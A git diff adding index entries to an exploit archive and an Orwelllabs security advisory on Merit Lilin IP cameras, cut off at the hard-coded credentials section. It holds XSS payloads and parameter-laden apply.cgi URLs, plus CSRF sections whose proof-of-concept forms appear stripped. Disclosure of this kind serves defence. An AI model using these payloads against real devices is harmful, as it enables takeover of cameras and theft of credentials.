diff --git a/files.csv b/files.csv index af159215c..b85dffdaa 100755 --- a/files.csv +++ b/files.csv @@ -35938,6 +35938,7 @@ id,file,description,date,author,platform,type,port 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x and 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 +39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443 39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 @@ -35955,3 +35956,11 @@ id,file,description,date,author,platform,type,port 39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 +39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 +39745,platforms/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80 +39746,platforms/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80 +39747,platforms/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",linux,dos,0 +39748,platforms/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow",2016-04-29,"Google Security Research",multiple,dos,0 +39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0 +39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0 +39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80 diff --git a/platforms/cgi/webapps/39746.txt b/platforms/cgi/webapps/39746.txt new file mode 100755 index 000000000..1251a6af6 --- /dev/null +++ b/platforms/cgi/webapps/39746.txt @@ -0,0 +1,389 @@ + _ _ _ _ _ _ _ _ _ _ + / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ +( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 ) + \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ + + www.orwelllabs.com + securityadivisory +@orwelllabs + ;)(r + + +By sitting in the alcove, and keeping well back, +Winston was able to remain outside the range of the telescreen... + + +* Adivisory Information +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +(+) Title: Merit Lilin IP Cameras Multiple Vulnerabilities +(+) Vendor: Merit Lilin Enterprise Co., Ltd. +(+) Research and Advisory: Orwelllabs +(+) Adivisory URL: +http://www.orwelllabs.com/2016/04/merit-lilin-ip-cameras-multiple_27.html +(+) OLSA-ID: OLSA-2016-04-28 +(+) Affected Versions: L series products with firmware 1.4.36/1.2.02, OS +Version: Linux 2.6.38/Linux 2.6.32 +(+) IoT Attack Surface: Device Administrative +Interface/Authentication/Authorization +(+) Owasp IoTTop10: I1, I2 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + +* Adivisory Overview +--+---------------------------------------------+------+-------------------------------------------- +id| Vulnerability Title | Rank | Attack Surface +--+---------------------------------------------+------+-------------------------------------------- +1 | Multiple Cross-site Request Forgery | I1 | Insecure Web Interfaces +2 | Multiple Cross-site Scripting/HTML Injection| I1 | Insecure Web +Interfaces +3 | Hard-coded credentials | I1 | Insecure Web Interfaces +4 | Cleartext sensitive data | I1 | Insecure Web Interfaces +5 | Weak Passwords/Known credentials | I1 | Insecure Web Interfaces +6 | Account lockout | I1 | Insecure Web Interfaces +7 | Poorly Protected Credentials | I2 | Insufficient +Authentication/Authorization +--+---------------------------------------------+------+-------------------------------------------- + + +Vendor Background +================= +LILIN, is a global IP video manufacturer of IP video cameras, recording +devices, and software with over 30 years of experience. + + +1. Multiple Cross-site Request Forgery +====================================== +Merit LILIN IP Cameras are prone to multiple cross-site request forgery +vulnerabilities. + + +(+) Technical Details and PoCs: +------------------------------- +# Basic >> System >> User + +> Changing 'admin' password to 'w!nst0nSm!th' + + + + +
+ +
+ + + +# Basic >> Network >> DDNS +> change DDNS information (user/hostname/password) + + + + +
+ +
+ + + + +# SNMP +> change community/user/pass/pripass/v3rouser/etc. + + + + +
+ +
+ + + + +# Basic >> Network >> SIP +> change sip_domain_server/sipreg_username/sipreg_password/sip_port=/etc. + + + + +
+ +
+ + + + + +2. Multiple Cross-site Scripting/HTML Injection +====================-========================== +Merit Lilin IP Cameras are prone to multiple cross-site scripting +vulnerabilities. + +Technical Details and PoCs: +--------------------------- + +[SAMBA] Advance >> System >> SAMBA Service +------------------------------------------ +%- Script: apply.cgi +%- affected parameters: + +(+) action +(+) SambaRecordState +(+) SAMBA_OSD +(+) SAMBARecordOption2 +(+) SAMBARecordFormat +(+) SAMBAPreRecordTime +(+) SAMBAServer +(+) SAMBAServerPort +(+) SAMBAServerAccount +(+) SAMBAServerPassword +(+) SAMBAServerDirectory + +%- [ *** XSS *** ] Payload(1) used: +123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E + +%- URL: http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS *** +]&SambaRecordState=[ *** XSS *** ]&SAMBA_OSD=[ *** XSS *** +]&SAMBARecordOption2=[ *** XSS *** ]&SAMBARecordFormat=[ *** XSS *** +]&SAMBAPreRecordTime=[ *** XSS *** ]&SAMBAServer=[ *** XSS *** +]&SAMBAServerPort=[ *** XSS *** ]&SAMBAServerAccount=[ *** XSS *** +]&SAMBAServerPassword=[ *** XSS *** ]&SAMBAServerDirectory=[ *** XSS *** ] + + +[General] -> Basic >> System >> General +--------------------------------------- +- Affected script: apply.cgi +- affected parameters: + +(+) action +(+) next_page +(+) SAMBAServerDirectory + +%- [ *** XSS *** ] Payload(2) used: +%22%3E%3Cscript%3Ealert%281%29%3C/script%3E + +%- URL http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS *** ]&next_page=[ +*** XSS *** +]&CAM_NAME=LR6122&ACTIVEX_OSD_NAME=LR6122&CAM_OSD=0&TIMER_OSD=0&ACTIVEX_OSD_ENABLE=0&ACTIVEX_MODE=0 + + +[HTTP POST Service] -> Advance >> Event >> HTTP POST Service +------------------------------------------------------------ +- Affected script: apply.cgi +- affected parameters: + +(+) AM_HTTP_JPEG +(+) next_page*-* +(+) HTTPPostPort*-* + +%- [ *** XSS *** ] Payload used: +123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E +*-* Payload(2) + +%- URL: +http://xxx.xxx.xxx.xxx/apply.cgi?action=httppost_apply&next_page=httppost.asp&HTTPServer=192.168.0.2&HTTPPostPort=56082&HTTPAccount=LILIN&HTTPPassword=control4&AM_HTTP_JPEG=[ +*** XSS *** ] + + +3. Hard-coded credentials +========================= +This application stores hard-coded credentials in html code. + +Technical Details and PoCs: +--------------------------- + +(+) GET -> http://xxx.xxx.xxx.xxx/new/index.htm +HTML Source code: + +